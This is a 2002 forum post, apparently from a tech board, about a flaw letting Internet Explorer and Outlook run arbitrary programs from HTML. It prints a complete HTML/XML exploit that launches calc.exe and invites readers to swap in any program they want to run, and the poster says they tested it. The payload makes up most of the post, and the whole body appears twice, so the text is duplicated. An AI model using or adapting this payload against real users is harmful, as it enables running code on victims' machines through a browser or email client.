Bookmark / Share this lokem
03-06-2002, 02:44 AM
The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.
Read the rest here:
http://www.theregister.co.uk/content/4/24274.html
The article also has a simple fix for this problem.
Here's the simple script:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
Read the rest here:
http://www.theregister.co.uk/content/4/24274.html
The article also has a simple fix for this problem.
Here's the simple script:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
